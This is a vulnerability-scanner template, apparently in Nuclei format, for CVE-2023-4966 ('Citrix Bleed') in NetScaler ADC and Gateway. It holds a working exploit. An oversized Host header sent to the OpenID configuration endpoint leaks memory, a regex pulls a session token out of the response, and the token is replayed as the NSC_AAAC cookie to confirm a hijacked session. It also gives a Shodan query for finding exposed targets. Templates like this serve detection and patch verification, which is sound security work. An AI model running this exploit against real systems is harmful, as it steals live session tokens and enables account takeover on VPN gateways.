id: CVE-2023-4966 info: name: Citrix Bleed - Leaking Session Tokens author: DhiyaneshDK severity: high description: | Sensitive information disclosure in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA ?virtual?server. reference: - https://github.com/assetnote/exploits/blob/main/citrix/CVE-2023-4966/exploit.py - https://github.com/Chocapikk/CVE-2023-4966 - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966 - https://x.com/assetnote/status/1716757539323564196?s=20 - https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo epss-score: 0.92267 epss-percentile: 0.98668 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" max-request: 2 vendor: citrix product: netscaler_application_delivery_controller shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" tags: cve,2023,citrix,adc,info-leak,kev variables: payload: '{{repeat("a", 24812)}}' str: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - |+ GET /oauth/idp/.well-known/openid-configuration HTTP/1.1 {{str}}: {{Hostname}} Host: {{payload}} - |+ POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1 Host: {{Hostname}} Cookie: NSC_AAAC={{session}} User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate, br Accept: */* Connection: close Content-Length: 0 unsafe: true extractors: - type: regex name: session part: body_1 group: 1 regex: - \b([a-f0-9]{65})\b internal: true - type: regex part: body_2 regex: - '([a-z0-9]+)' matchers-condition: and matchers: - type: word part: body_1 words: - 'NSC_AAAC=' - '{"issuer":' condition: and - type: word part: header_2 words: - "text/plain" # digest: 490a0046304402207aa7e756da1c4be5727458d2eb2ef1a52f019fd2e87031ac0604c6ba6f243de202204d4cb5e65870d14b46ef1023b0f6d501aaba5ab7dd6d185a4d868aa0eb9c2bc0:922c64590222798bb761d5b6d8e72950